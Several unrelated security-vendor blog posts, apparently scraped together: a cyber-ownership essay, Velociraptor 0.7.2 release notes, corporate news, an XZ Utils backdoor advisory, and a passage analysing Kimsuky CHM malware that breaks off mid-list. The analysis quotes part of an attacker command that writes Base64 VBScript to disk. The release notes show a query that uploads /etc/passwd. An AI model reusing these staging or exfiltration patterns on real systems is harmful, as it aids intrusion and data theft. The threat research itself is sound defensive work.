Many would say the answer is obvious. It’s the chief information security officer (CISO) and his or her team, of course. However, it’s not that simple. Sure, the CISO and their team are responsible for setting the strategy and executing on the cyber plan. But, with a multitude of security challenges thrown at them each day, it requires a proactive and informed approach that goes beyond the core cyber team.

Cyber ownership can often be overlooked or misunderstood within an organization. Responsibility and accountability should not rest solely on the CISO's shoulders. And while the IT department will also have a role to play, security responsibilities must be ingrained in the culture of the entire organization. They should include each responsible asset owner, not forgetting that data is also an asset.

Cultivating a culture of cybersecurity ownership empowers security leaders, IT professionals, and decision-makers to navigate security challenges effectively. This approach not only strengthens your organisation's security posture but also positions security as an enabler of innovation and digitalisation. The more eyes there are on security within your business, the greater the ability of your cyber teams to strive for increasing levels of maturity and a stronger overall security posture.

Redefine Organisational Responsibility

While cybersecurity teams or IT departments maintain control, everyone in the organisation plays a role. Executives and management must take charge and set the tone by prioritising cybersecurity as a business objective. They should work from the top-down to develop policies and frameworks, with the cyber teams or IT department responsible for implementing and enforcing them. By allocating resources, establishing policies, and promoting a security-conscious culture, leadership sends a powerful message that cybersecurity is not just an IT concern, but a shared responsibility.

Security responsibilities should also align with specific business functions and the potential impact of a breach. For instance, when assessing supply chain risks, consider factors such as data access and systems integration. This enables you to identify critical suppliers and prioritise efforts to enhance your security posture.

Integrate Security Leaders into the Business at a Deeper Level

Security leaders are critical to ensuring cybersecurity is given the necessary focus and attention at all levels of your organisation. By involving experts in the overall risk conversation and decision-making forums, you can tap into valuable insights and expertise to effectively address evolving security challenges.

For example, many boards lack technical expertise and cybersecurity knowledge. This can hinder effective risk management and decision-making around cyber security challenges and strategy. Having a security leader at the board level will bridge this knowledge gap. It helps to facilitate communication, and ensure members grasp the importance of cybersecurity within the context of your organisation's digital landscape.

Employee Awareness Training

Employees are a critical part of preventing and mitigating security risks. Despite this very common understanding, only 34% of organizations (PwC Digital Trust Insights) globally have an employee security awareness training program. Without proper awareness and education, employees may unknowingly engage in risky behaviors or fall victim to social engineering attacks. This can lead to potential data breaches and significant financial and reputational impacts on your organization.

It’s a good idea to prioritise regular training initiatives that provide employees with up-to-date knowledge and skills to identify and respond effectively to security threats. These training programs should cover a range of topics, such as identifying phishing attempts, securing personal devices, and understanding the importance of strong passwords and data protection. Additionally, training should be tailored to each business unit's specific needs. It should also be delivered in a format that resonates, such as interactive modules, simulated phishing exercises, or workshops.

Consider providing additional training to individuals designated as security champions within your business. These champions will promote good security practices as well as encourage and help others, while also maintaining a security-conscious culture across the entire organization.

How Rapid7 Can Help: Managed Threat Complete

While everyone in the organisation can play a role in maintaining a good culture of cybersecurity, sometimes it helps to get a little additional outside support. Managed Threat Complete ensures your environment is monitored end-to-end, 24/7, by an elite SOC that works transparently with your in-house team, helping to further expand your resources.

Foster Transparency and Mutual Support

Data privacy and security regulations have become increasingly stringent in recent years. As such, the consequences of non-compliance can be severe, ranging from financial penalties to reputational damage –even legal action against boards and directors.

Organisations are now obligated to protect the personal and sensitive data they collect and process. Familiarising your organisation with required data privacy laws enables you to establish appropriate safeguards and avoid hefty penalties. For instance, sectors such as telecommunications, banking, healthcare, energy, and transportation are subject to specialised regulations, such as critical infrastructure policies.

While legal obligations are an important aspect of cybersecurity,  you must also strike a balance between compliance and business needs. Small businesses, in particular, may face challenges in meeting extensive legal requirements. However, by approaching compliance strategically and prioritising resources, small businesses can develop effective cybersecurity measures without compromising protection.

It’s everyone’s business

CISOs and their teams are responsible for setting the strategy, providing visibility and guidance on cyber risk, and working with the business to execute on the cyber plan. Embrace the opportunity to strengthen your cybersecurity posture by providing your workforce with the autonomy to be the guardians of your digital future. This in turn frees up the security team’s time to focus on advanced cyber measures that add even greater value to the business.

By Dr. Mike Cohen and Carlos Canto

Rapid7 is very excited to announce that version 0.7.2 of Velociraptor is now fully available for download.

In this post we’ll discuss some of the interesting new features.

EWF Support

Velociraptor has introduced the ability to analyze dead disk images in the past. Although we don’t need to analyze disk images very often, it comes up occasionally.

Previously, Velociraptor only supported analysis of DD images (AKA “Raw images”). Most people use standard acquisition software to acquire images, which uses the common EWF format to compress them.

In this 0.7.2 release, Velociraptor supports EWF (AKA E01) format using the ewf accessor. This allows Velociraptor to analyze E01 image sets.

To analyze dead disk images use the following steps:

1. Create a remapping configuration that maps the disk accessors into the E01 image. This automatically diverts VQL functions that look at the filesystem into the image instead of using the host’s filesystem. In this release you can just point the --add_windows_disk option to the first disk of the EWF disk set (the other parts are expected to be in the same directory and will be automatically loaded).
   The following creates a remapping file by recognizing the windows partition in the disk image.

$ velociraptor-v0.72-rc1-linux-amd64 deaddisk
--add_windows_disk=/tmp/e01/image.E01 /tmp/remapping.yaml -v

2. Next we launch a client with the remapping file. This causes any VQL queries that access the filesystem to come from the image instead of the host. Other than that, the client looks like a regular client and will connect to the Velociraptor server just like any other client. To ensure that this client is unique you can override the writeback location (where the client id is stored) to a new file.

$ velociraptor-v0.72-rc1-linux-amd64 --remap /tmp/remapping.yaml
--config ~/client.config.yaml client -v
--config.client-writeback-linux=/tmp/remapping.writeback.yaml

Allow remapping clients to use SSH accessor

Sometimes we can’t deploy the Velociraptor client on a remote system. (For example, it might be an edge device like an embedded Linux system or it may not be directly supported by Velociraptor.)

In version 0.7.1, Velociraptor introduced the ssh accessor which allows VQL queries to use a remote ssh connection to access remote files.

This release added the ability to apply remapping in a similar way to the dead disk image method above to run a Virtual Client which connects to the remote system via SSH and emulates filesystem access over the sftp protocol.

To use this feature you can write a remapping file that maps the ssh accessor instead of the file and auto accessors:

remappings:

• type: permissions
  permissions:

  • COLLECT_CLIENT
  • FILESYSTEM_READ
  • READ_RESULTS
  • MACHINE_STATE

• type: impersonation
  os: linux
  hostname: RemoteSSH

• type: mount
  scope: |
  LET SSH_CONFIG <= dict(hostname='localhost:22',
  username='test',
  private_key=read_file(filename='/home/test/.ssh/id_rsa'))

  from:
  accessor: ssh

  "on":
  accessor: auto
  path_type: linux

• type: mount
  scope: |
  LET SSH_CONFIG <= dict(hostname='localhost:22',
  username='test',
  private_key=read_file(filename='/home/test/.ssh/id_rsa'))

  from:
  accessor: ssh

  "on":
  accessor: file
  path_type: linux

Now you can start a client with this remapping file to virtualize access to the remote system via SSH.

$ velociraptor-v0.72-rc1-linux-amd64 --remap /tmp/remap_ssh.yaml
--config client.config.yaml client -v
--config.client-writeback-linux=/tmp/remapping.writeback_ssh.yaml
--config.client-local-buffer-disk-size=0

GUI Changes

The GUI has been significantly improved in this release.

Undo/Redo for notebook cells

Velociraptor offers an easy way to experiment and explore data with VQL queries in the notebook interface. Naturally, exploring the data requires going back and forth between different VQL queries.

In this release, Velociraptor keeps several versions of each VQL cell (by default 5) so as users explore different queries they can easily undo and redo queries. This makes exploring data much quicker as you can go back to a previous version instantly.

Hunt view GUI is now paged

Previously, hunts were presented in a table with limited size. In this release, the hunt table is paged and searchable/sortable. This brings the hunts table into line with the other tables in the interface and allows an unlimited number of hunts to be viewable in the system.

Secret Management

Many Velociraptor plugins require secrets to operate. For example, the ssh accessor requires a private key or password to log into the remote system. Similarly the s3 or smb accessors require credentials to upload to the remote file servers. Many connections made over the http_client() plugin require authorization – for example an API key to send Slack messages or query remote services like Virus Total.

Previously, plugins that required credentials needed those credentials to be passed as arguments to the plugin. For example, the upload_s3() plugin requires AWS S3 credentials to be passed in as parameters.

This poses a problem for the Velociraptor artifact writer: how do you safely provide the credentials to the VQL query in a way that does not expose them to every user of the Velociraptor GUI? If the credentials are passed as parameters to the artifact then they are visible in the query logs and request, etc.

This release introduces Secrets as a first class concept within VQL. A Secret is a specific data object (key/value pairs) given a name which is used to configure credentials for certain plugins:

1. A Secret has a name which we use to refer to it in plugins.
2. Secrets have a type to ensure their data makes sense to the intended plugin. For example a secret needs certain fields for consumption by the s3 accessor or the http_client() plugin.
3. Secrets are shared with certain users (or are public). This controls who can use the secret within the GUI.
4. The GUI is careful to not allow VQL to read the secrets directly. The secrets are used by the VQL plugins internally and are not exposed to VQL users (like notebooks or artifacts).

Let’s work through an example of how Secrets can be managed within Velociraptor. In this example we store credentials for the ssh accessor to allow users to glob() a remote filesystem within the notebook.

First we will select manage server secrets from the welcome page.

Next we will choose the SSH PrivateKey secret type and add a new secret.

This will use the secret template that corresponds to the SSH private keys. The acceptable fields are shown in the GUI and a validation VQL condition is also shown for the GUI to ensure that the secret is properly populated. We will name the secret DevMachine to remind us that this secret allows access to our development system. Note that the hostname requires both the IP address (or dns name) and the port.

Next we will share the secrets with some GUI users

We can view the list of users that are able to use the secret within the GUI

Now we can use the new secret by simply referring to it by name:

Not only is this more secure but it is also more convenient since we don’t need to remember the details of each secret to be able to use it. For example, the http_client() plugin will fill the URL field, headers, cookies etc directly from the secret without us needing to bother with the details.

WARNING: Although secrets are designed to control access to the raw credential by preventing users from directly accessing the secrets' contents, those secrets are still written to disk. This means that GUI users with direct filesystem access can simply read the secrets from the disk.

We recommend not granting untrusted users elevated server permissions like EXECVE or Filesystem Read as it can bypass the security measures placed on secrets.

Server improvements

Implemented Websocket based communication mechanism

One of the most important differences between Velociraptor and some older remote DFIR frameworks such as GRR is the fact that Velociraptor maintains a constant, low latency connection to the server. This allows Velociraptor clients to respond immediately without needing to wait for polling on the server.

In order to enhance compatibility between multiple network configurations like MITM proxies, transparent proxies etc., Velociraptor has stuck to simple HTTP based communications protocols. To keep a constant connection, Velociraptor uses the long poll method, keeping HTTP POST operations open for a long time.

However as the Internet evolves and newer protocols become commonly used by major sites, the older HTTP based communication method has proven more difficult to use. For example, we found that certain layer 7 load balancers interfere with the long poll method by introducing buffering to the connection. This severely degrades communications between client and server (Velociraptor falls back to a polling method in this case).

On the other hand, modern protocols are more widely used, so we found that modern load balancers and proxies already support standard low latency communications protocols such as Web Sockets.

In the 0.7.2 release, Velociraptor introduces support for websockets as a communications protocol. The websocket protocol is designed for low latency and low overhead continuous communications methods between clients and server (and is already used by most major social media platforms, for example). Therefore, this new method should be better supported by network infrastructure as well as being more efficient.

To use the new websocket protocol, simply set the client’s server URL to have wss:// scheme:

Client:
server_urls:

• wss://velociraptor.example.com:8000/
• https://velociraptor.example.com:8000/

You can use both https and wss URLs at the same time, Velociraptor will switch from one to the other scheme if one becomes unavailable.

Dynamic DNS providers

Velociraptor has the capability to adjust DNS records by itself (AKA Dynamic DNS). This saves users the hassle of managing a dedicated dynamic DNS service such as ddclient).

Traditionally we used Google Domains as our default Dynamic DNS provider, but Google has decided to shut down this service abruptly forcing us to switch to alternative providers.

The 0.7.2 release has now switched to CloudFlare as our default preferred Dynamic DNS provider. We also added noip.com as a second option.

Setting up CloudFlare as your preferred dynamic DNS provider requires the following steps:

1. Sign into CloudFlare and buy a domain name.
2. Go to https://dash.cloudflare.com/profile/api-tokens to generate an API token. Select Edit Zone DNS in the API Token templates.

You will need to require the “Edit” permission on Zone DNS and include the specific zone name you want to manage. The zone name is the domain you purchased, e.g. “example.com”. You will be able to set the hostname under that domain, e.g. “velociraptor.example.com”.

Using this information you can now create the dyndns configuration:

Frontend:
....
dyn_dns:
type: cloudflare
api_token: XXXYYYZZZ
zone_name: example.com

Make sure the Frontend.Hostname field is set to the correct hostname to update - for example

Frontend:
hostname: velociraptor.example.com

This is the hostname that will be updated.

Enhanced proxy support

Velociraptor is often deployed into complex enterprise networks. Such networks are often locked down with complicated controls (such as MITM inspection proxies or automated proxy configurations) which Velociraptor needs to support.

Velociraptor already supports MITM proxies but previously had inflexible proxy configuration. The proxy could be set or unset but there was no finer grained control over which proxy to choose for different URLs. This makes it difficult to deploy on changing network topologies (such as roaming use).

The 0.7.2 release introduces more complex proxy condition capabilities. It is now possible to specify which proxy to use for which URL based on a set of regular expressions:

Client:
proxy_config:
http: http://192.168.1.1:3128/
proxy_url_regexp:
"^https://www.google.com/": ""
"^https://.+example.com": "https://proxy.example.com:3128/"

The above configuration means to:

1. By default connect to http://192.168.1.1:3128/ for all URLs (including https)
2. Except for www.google.com which will be connected to directly.
3. Any URLs in the example.com domain will be forwarded through https://proxy.example.com:3128

This proxy configuration can apply to the Client section or the Frontend section to control the server’s configuration.

Additionally, Velociraptor now supports a Proxy Auto Configuration (PAC) file. If a PAC file is specified, then the other configuration directives are ignored and all configuration comes from the PAC file. The PAC file can also be read from disk using the file:// URL scheme, or even provided within the configuration file using a data: URL.

Client:
proxy_config:
pac: http://www.example.com/wpad.dat

Note that the PAC file must obviously be accessible without a proxy.

Other notable features

Other interesting improvements include:

Process memory access on MacOS

On MacOS we can now use proc_yara() to scan process memory. This should work providing your TCT profile grants the get-task-allow, proc_info-allow and task_for_pid-allow entitlements. For example the following plist is needed at a minimum:

Multipart uploaders to http_client()

Sometimes servers require uploaded files to be encoded using the mutipart/form method. Previously it was possible to upload files using the http_client() plugin by constructing the relevant request in pure VQL string building operations.

However this approach is limited by available memory and is not suitable for larger files. It is also non-intuitive for users.

This release adds the files parameter to the http_client() plugin. This simplifies uploading multiple files and automatically streams those files without memory buffering - allowing very large files to be uploaded this way.

For example:

SELECT *
FROM http_client(
url='http://localhost:8002/test/',
method='POST',
files=dict(file='file.txt', key='file', path='/etc/passwd', accessor="file")

Here the files can be an array of dicts with the following fields:

• file: The name of the file that will be stored on the server
• key: The name of the form element that will receive the file
• path: This is an OSPath object that we open and stream into the form.
• accessor: Any accessor required for the path.

Yara plugin can now accept compiled rules

The yara() plugin was upgraded to use Yara Version 4.5.0 as well as support compiled yara rules. You can compile yara rules with the yarac compiler to produce a binary rule file. Simply pass the compiled binary data to the yara() plugin’s rules parameter.

WARNING: We do not recommend using compiled yara rules because of their practical limitations:

1. The compiled rules are not portable and must be used on exactly the same version of the yara library as the compiler that created them (Currently 4.5.0)
2. Compiled yara rules are much larger than the text rules.

Compiled yara rules pose no benefit over text based rules, except perhaps being more complex to decompile. This is primarily the reason to use compiled rules - to try to hide the rules (e.g. from commercial reasons).

Conclusions

There are many more new features and bug fixes in the 0.7.2 release. If you’re interested in any of these new features, why not take Velociraptor for a spin by downloading it from our release page? It’s available for free on GitHub under an open-source license.

As always, please file bugs on the GitHub issue tracker or submit questions to our mailing list by emailing velociraptor-discuss@googlegroups.com. You can also chat with us directly on our Discord server.

Learn more about Velociraptor by visiting any of our web and social media channels below:

• Official Website
• Documentation Site
• X (Twitter)
• LinkedIn
• Instagram
• YouTube

Registration is now open for Take Command, a day-long virtual summit in partnership with AWS. You do not want to miss it. You’ll get new attack intelligence, insight into AI disruption, transparent MDR partnerships, and more.

In 2024, adversaries are using AI and new techniques, working in gangs with nation-state budgets. But it’s “inevitable” they’ll succeed? Really?

Before any talk of surrender, please join us at Take Command. We’ve packed the day with information and insights you can take back to your team and use immediately.

You’ll hear from Chief Scientist Raj Samani, our own Chief Security Officer Jaya Baloo, global security leaders, hands-on practitioners, and Rapid7 Labs leaders like Christiaan Beek and Caitlin Condon. You’ll get a first look at new, emergent research, trends, and intelligence from the curators of Metasploit and our renowned open source communities.

You’ll leave with actionable strategies to safeguard against the newest ransomware, state-sponsored TTPs, and marquee vulnerabilities.

Can’t make the entire day? Check out the agenda, see what fits

The summit kicks off with back-to-back keynotes. First, “Know Your Adversary: Breaking Down the 2024 Attack Intelligence Report” and “The State of Security 2024.”

You’ll get an insider view of Rapid7’s MDR SOC. Sessions range from “Building Defenses Through AI” to “Unlocking Success: Strategies for Measuring Team Performance” to a big favorite “Before, During, & After Ransomware Attacks.” Though no one really talks about it, there’s a lengthy “before” period, and new, good things you can do to frustrate the bad guys.

Take Command will offer strategies on building cybersecurity culture (yes, it’s difficult with humans). And, of course, preparing for the Securities & Exchange Commission's Cybersecurity Disclosure Rules. You’ll hear from Sabeen Malik, VP, Global Government Affairs and Public Policy, Kyra Ayo Caros Director, Corporate Securities & Compliance and Harley L. Geiger, Venable LLP.

Now, turning the tables on attackers is possible

Adversaries are inflicting $10 trillion in damage to the global economy every year , and the goal posts keep moving. As risks from cloud, IoT, AI and quantum computing proliferate and attacks get more frequent, SecOps have never been more stressed. And more in need of sophisticated guidance.

Mark your calendar for May 21. Get details here. You’ll be saving a lot more than the date.

Authored by Damon Cabanillas

Rapid7's Insight Platform has officially achieved Level 2 Texas Risk and Authorization Management Program (TX-RAMP) authorization. This milestone marks a significant step forward in providing our customers peace-of-mind as well as the best end-to-end cloud security solutions.

According to the official TX-RAMP manual, Level 2 TX-RAMP authorization “is required for cloud computing services that store, process, or transmit confidential data of a state agency and the cloud computing service is determined to be moderate or high impact information resources.”

This authorization also signifies our unwavering commitment to cybersecurity compliance as well as the people, processes, and technology required to safeguard the confidential data of our customers and mitigate an ever-expanding attack surface.

Public-Sector Validation in Texas

Cloud security providers (CSPs) must keep pace with the ever-evolving variety of controls and requirements enacted at the state level, ensuring they continue to comply with statutory requirements for contracting with public-sector organizations (state agencies, higher-education institutions, etc.) in Texas – the world’s eighth largest economy.

As such, the Rapid7 Insight Platform will now be more readily available to customers across the state of Texas, empowering organizations to enhance and simplify security operations while delivering risk context across today's hybrid environments. Multiple cross-functional teams within Rapid7 helped to drive this alignment to stringent and confidential data-security requirements.

What are We Looking to Achieve?

With this authorization, public-sector customers can leverage Rapid7's Insight Platform to modernize security operations and visibility across key areas such as:

• Vulnerability management
  
• Detection and response
  
• Application security
  
• Cloud-native application protection

This approach to security helps cyber-defenders understand contextual risk at scale across the hybrid environment (on-premise, remote workers, cloud). They can also leverage cutting-edge AI to automate detections and the required remediations to mitigate critical vulnerabilities – saving time, money, and reputation. Achieving Level 2 TX-RAMP authorization reflects Rapid7’s continuing commitment to:

• Aligning to regulatory and compliance standards set forth by governmental entities around the globe
  
• Delivering best-in-class solutions that meet and exceed industry standards

Learn more about TX-RAMP and how Rapid7 is poised to lead the charge towards a safer, more secure digital future.

Starting a career for the first time in a new country can be intimidating. For Rudina Tafhasaj, her path to Senior Application Engineer at Rapid7 was paved with both unique challenges, and incredible rewards.

Growing up, Rudina was inspired to get into technology by her older brother. “He loved computers, and he was always opening up our big PC. I was curious, and would sneak around to see what he was doing,” Rudina says. “As I grew more, I saw that advances in technology were helping improve lives in so many ways. I knew it was going to be a big part of the future, and wanted to be involved.”

But technology wasn’t her only passion at a young age.

“Deep down my dream and passion is to be an actress - which is totally different! As I grew more, what I realized was that I actually loved the creativity involved in acting, and having the opportunity to network and work with other people.” While there may not always be cameras rolling, Rudina feels there are often similarities between her love of acting and her role today. “I can be creative in code, I can role play different scenarios, and this career is a way for me to tap into both of my passions. I am able to work on really impactful technology in a way that allows me to be creative while also partnering with all kinds of different people and teams along the way.”

At the very beginning of her career, Rudina faced a unique challenge that included relocating from her home in Albania to a new city in the Czech Republic. “It wasn’t easy moving to Prague. I had a tough time adjusting because I had never traveled, never lived on my own, and never had a professional job - and here I was tackling all three at once!” As the only daughter in a family with three brothers, she notes how she had to advocate for herself with her family in making such a big life change. While working as a Junior Developer, she had to work hard to overcome challenges and make an impact in her work.

“At my first job, as I was navigating all of this change, I got a really critical piece of feedback from my manager. I wasn’t developing my skills as much as he expected to see. I was in danger of losing my job if I didn’t make some dramatic improvements.”

This hard conversation served as a wakeup call for Rudina, and ignited her commitment to invest in learning and strengthening her skills so she could achieve her goals. While the feedback was hard to hear, Rudina notes that her manager continued to be supportive of her growth and wanted to help her succeed. “For 6 months, I woke up, went to work, came home, ate dinner, and then studied until it was time for bed. After doing that on repeat, my manager was able to see a dramatic improvement in the rate in which I was learning and growing. While there was still more to learn, he was impressed with my dedication and I continued to grow in my role.”

Rudina’s hard work paid off, and two years later, she took her career a step further with a position as a Salesforce Developer at Barclays. “I am so grateful to have had a manager that was able to give me the feedback I needed, while also encouraging me to stick with it and offer support along the way.”

Now a Senior Software Engineer at Rapid7, she reflects on her journey with a strong sense of pride and accomplishment. “Whatever challenges I went through in previous employers has made me the best person for Rapid7, and I’m grateful for all of my past experiences.” Overcoming challenges can sometimes feel uncomfortable, but it is often necessary to grow and move our careers forward. “It’s a continuous cycle too, as you grow and get more experience, you continue to set your goals higher and seek out the next challenge. There is always more to learn and more ways to grow in your career, especially in technology.”

Her appetite for continued growth is what ultimately brought her to Rapid7’s newest office in Prague in 2023. “I felt like I was ready for new challenges that would continue to accelerate my growth.” When looking at where to go next, she had three requirements that she was looking for in her next employer.

1. A clear development plan with support from her manager
2. A culture rooted in honesty and trust
3. Competitive and fair compensation for her work. Growing her earning potential alongside the growth of her career as she continued to advance.

“When interviewing for the role at Rapid7, I found evidence of everything on my list, and so much more as well. What really stands out the most is the trust and responsibility given to me by the business analysts or project managers that I partner with. They will share what they are looking to do, and then give me the responsibility and the autonomy to go ahead and find a way to make it happen - even when I’m brand new. It feels good to be given that trust and to be able to work on business critical initiatives where my ideas are respected and valued.”

When asked what advice she would give others looking to take on a new role, she says to note down what your expectations and goals are. “Use the interview time to ask whatever questions you need to help understand if it’s the right move for you, or not.” Rudina says having things defined before the call helps you stay on track and get the most value as you weigh your options. “I had a lot of questions during my interview - but because I was able to get answers, I walked away with a really confident feeling that the role at Rapid7 was going to be just what I was looking for.”

For Rudina, growth and development was essential in her next role. As someone who embraces new challenges, and represents Rapid7’s core values every day through her actions and work, it didn’t take long for her to be offered yet another opportunity. Within her first three months, she was given the chance to serve as a team lead. She looks forward to continuing to make an impact in her work, grow her career, and support others through her participation in the Rapid7 Women Impact Group.

To learn more about career opportunities and what it’s like to work at Rapid7, visit our careers site.

On Friday, March 29, after investigating anomalous behavior in his Debian sid environment, developer Andres Freund contacted an open-source security mailing list to share that he had discovered an upstream backdoor in widely used command line tool XZ Utils (liblzma). The backdoor, added by an open-source committer who had been working on the tool for several years, affects XZ Utils versions 5.6.0 and 5.6.1. It has been assigned CVE-2024-3094.

According to Red Hat’s advisory –

“The malicious injection present in the xz versions 5.6.0 and 5.6.1 libraries is obfuscated and only included in full in the download package - the Git distribution lacks the M4 macro that triggers the build of the malicious code. The second-stage artifacts are present in the Git repository for the injection during the build time, in case the malicious M4 macro is present.

The resulting malicious build interferes with authentication in sshd via systemd.  SSH is a commonly used protocol for connecting remotely to systems, and sshd is the service that allows access.  Under the right circumstances this interference could potentially enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely.”

Community analysis of the backdoor is ongoing. Fortunately, thanks to Freund’s discovery, the backdoored version of the utility did not affect stable branches of most major Linux distributions and is unlikely to have made it into any production systems. The most at-risk category of users is likely developers, many of whom tend to run bleeding-edge versions of Linux.

Mitigation Guidance

XZ Utils users should downgrade to an older version of the utility immediately (i.e., any version before 5.6.0) and update their installations and packages according to distribution maintainer directions.

Major Linux distributions and package maintainers have published guidance on updating. Below is a list of affected and unaffected distributions — please refer to individual distribution and package advisories for the latest information and remediation guidance.

Affected distributions (as of March 31)

Debian

unstable / sid only — “versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1.”

Kali Linux

Systems updated between March 26 and March 29, 2024

OpenSUSE

Tumbleweed and MicroOS rolling releases between March 7 and March 28, 2024

Arch Linux

• Installation medium 2024.03.01
• Virtual machine images 20240301.218094 and 20240315.221711
• Container images created between and including 2024-02-24 and 2024-03-28

Red Hat

Fedora Rawhide and Fedora 40 Linux beta

The following distributions have indicated they are not affected:

• Ubuntu
• Alpine Linux
• Amazon Linux
• Red Hat Enterprise Linux
• Gentoo
• Linux Mint

Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to CVE-2024-3094 with authenticated and agent-based package version checks, available as of the April 1, 2024 content release.

InsightCloudSec customers can assess their cloud resources using Host and Container Vulnerability Assessment capabilities. When enabled, customers can go to ‘Vulnerabilities > Software’ and add the following filter:

• Software Name contains xz
• Software Version starts with 5.6

Customers can also search for ‘xz’ with the ‘Show Software without Vulnerabilities’ box checked to see all deployed versions of the software.

Rapid7 Labs has shared this Velociraptor artifact to help search for installed vulnerable packages.

Blog Updates

April 2, 2024: Updated to note that InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-3094 with authenticated and agent-based vulnerability checks in today's (April 1) content release. Customers using the latest version of InsightCloudSec can also assess their cloud resources for exposure.

Co-authors are Robin Long and Raj Samani

Considerable focus within the cybersecurity industry has been placed on the attack surface of organizations, giving rise to external attack surface management (EASM) technologies as a means to monitor said surface. It would appear a reasonable approach, on the premise that a reduction in exposed risk related to the external attack surface reduces the likelihood of compromise and potential disruption from the myriad of ransomware groups targeting specific geographies and sectors.

But things are never quite that simple. The challenge, of course, is that the exposed external risks extend beyond the endpoints being scanned. With access brokers performing the hard yards for ransomware affiliates gathering information, identifying initial entry vectors is more than a simple grab of banners.

Rapid7 Labs’s recent analysis looked at the external access surface of multiple sectors within the APAC region over the last half of 2023, with considerable data available well beyond open RDP and unpatched systems. What is revealing is the scale of data that appears to be aiding the access brokers, such as the exposure of test systems or unmaintained hosts to the internet, or the availability of leaked credentials. Each of these gives the multitude of ransomware actors the opportunity to conduct successful attacks while leveraging the hard work of access brokers.

What is interesting as we consider these regionally-targeted campaigns is that the breadth of threat groups is rather wide, but the group which is most prevalent does vary based on the targeted geography or sector. (Please note that this data predates the possible exit scam reported and therefore does not take it into account.)

The following graphic shows the sectors targeted, and the various threat groups targeting them, within Australia:

If we compare the most prevalent groups in Japan, however, the landscape does change somewhat:

All of which does focus the mind on this concept of actionable intelligence. Typically organizations have taken a one-size-fits-all approach to risk prioritization; however, a more nuanced approach could be to consider the threat groups targeting the given sector of an organization as a higher priority.

The need to move into this new world of intelligence led security operations is very clear, and it’s felt on an almost daily basis. Within a year we have witnessed such a fundamental increase in the level of capabilities from threat groups whose previous modus operandi was entrenched in the identification of leaked credentials, yet will now happily burn 0days with impunity.

Our approach within Rapid7 Labs is to provide context wherever possible. We strongly urge readers to leverage resources such as AttackerKB to better understand the context of these CVEs, or the likes of Metasploit to validate whether the reports from their external scan warrant an out-of-cycle security update. These, of course, are just the tip of the iceberg, but our approach remains constant: context is critical, as is agility. We are faced with more noise than ever before, and any measures that can be used to filter this out should be a critical part of security operations.

Co-authors are Christiaan Beek and Raj Samani

Within Rapid7 Labs we continually track and monitor threat groups. This is one of our key areas of focus as we work to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify evolving tactics from threat groups in what is an unceasing game of cat and mouse.

Our team recently ran across some interesting activity that we believe is the work of the Kimsuky threat actor group, also known as Black Banshee or Thallium. Originating from North Korea and active since at least 2012, Kimsuky focuses primarily on intelligence gathering. The group is known to have targeted South Korean government entities, individuals associated with the Korean peninsula's unification process, and global experts in various fields relevant to the regime's interests. In recent years, Kimsuky’s activity has also expanded across the APAC region to impact Japan, Vietnam, Thailand, etc.

Through our research, we saw an updated playbook that underscores Kimsuky’s efforts to bypass modern security measures. Their evolution in tactics, techniques, and procedures (TTPs) underscores the dynamic nature of cyber espionage and the continuous arms race between threat actors and defenders.

In this blog we will detail new techniques that we have observed used by this actor group over the recent months. We believe that sharing these evolving techniques gives defenders the latest insights into measures required to protect their assets.

Anatomy of the Attack

Let’s begin by highlighting where we started our analysis of Kimsuky and how the more we investigated, the more we discovered — to the point where we believe we observed a new wave of attacks by this actor.

Following the identification of the target, typically we would anticipate the reconnaissance phase to initiate in an effort to identify methods to allow access into the target. Since Kimsuky’s focus is intelligence gathering, gaining access needs to remain undetected; subsequently, the intrusion is intended to not trigger alerts.

Over the years, we have observed a change in this group’s methods, starting with weaponized Office documents, ISO files, and beginning last year, the abuse of shortcut files (LNK files). By disguising these LNK files as benign documents or files, attackers trick users into executing them. PowerShell commands, or even full binaries, are hidden in the LNK files — all hidden for the end-user who doesn’t detect this at the surface.

Our latest findings lead us to observations that we believe are Kimsuky using CHM files which are delivered in several ways, as part of an ISO|VHD|ZIP or RAR file. The reason they would use this approach is that such containers have the ability to pass the first line of defense and then the CHM file will be executed.

CHM files, or Compiled HTML Help files, are a proprietary format for online help files developed by Microsoft. They contain a collection of HTML pages and a table of contents, index, and full text search capability. Essentially, CHM files are used to display help documentation in a structured, navigable format. They are compiled using the Microsoft HTML Help Workshop and can include text, images, and hyperlinks, similar to web pages, but are packaged as a single compressed file with a .chm extension.

While originally designed for help documentation, CHM files have also been exploited for malicious purposes, such as distributing malware, because they can execute JavaScript when opened. CHM files are a small archive that can be extracted with unzipping tools to extract the content of the CHM file for analysis.

The first scenario in our analysis can be visualized as follows:

The Nuclear Lure

While tracking activity, we first discovered a CHM file that triggered our attention.

Analyzing this file in a controlled environment, we observe that the CHM file contains the following files and structure:

The language of the filenames is Korean. With the help of translation software, here are the file names:

• North Korea's nuclear strategy revealed in 'Legalization of Nuclear Forces'.html
• Incomplete.html
• Factors and types of North Korea’s use of nuclear weapons.html
• North Korean nuclear crisis escalation model and determinants of nuclear use.html
• Introduction.html
• Previous research review.html
• Research background and purpose.html

These HTML files are linked towards the main HTML file ‘home.html’ — we will return later to this file.

Each filetype has its unique characteristics, and from the area of file forensics let’s have a look at the header of the file:

The value 0412 as a language ID is “Korean - Korea”. This can be translated to mean the Windows operating system that was used to create this CHM file was using the Korean language.

When the CHM file is executed, it will showcase the following:

The page in the right pane is the ‘home.html’ file. This page contains an interesting piece of code:

The provided code snippet is an example of using HTML and ActiveX to execute arbitrary commands on a Windows machine, typically for malicious purposes. The value assigned to a ‘Button’ contains a command line with Base64 code in it as another obfuscation technique and is followed by a living-off-the-land technique, thereby creating persistence on the victim’s system to run the content.

Let’s break it up and understand what the actor is doing:

1. Base64 Encoded VBScript Execution (T1059.003):

• echo T24gRXJyb3IgUmVzdW1lIE5leHQ...: This part echoes a Base64-encoded string into a file. The string, when decoded, is VBScript code. The VBScript is designed to be executed on the victim's machine. The decoded Base64 value is:

2. Saving to a .dat File:

• >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat": The echoed Base64 string is redirected and saved into a .dat file within the current user's Links directory. The filename seems randomly generated or obfuscated to avoid easy detection.

3. Decoding the .dat File:

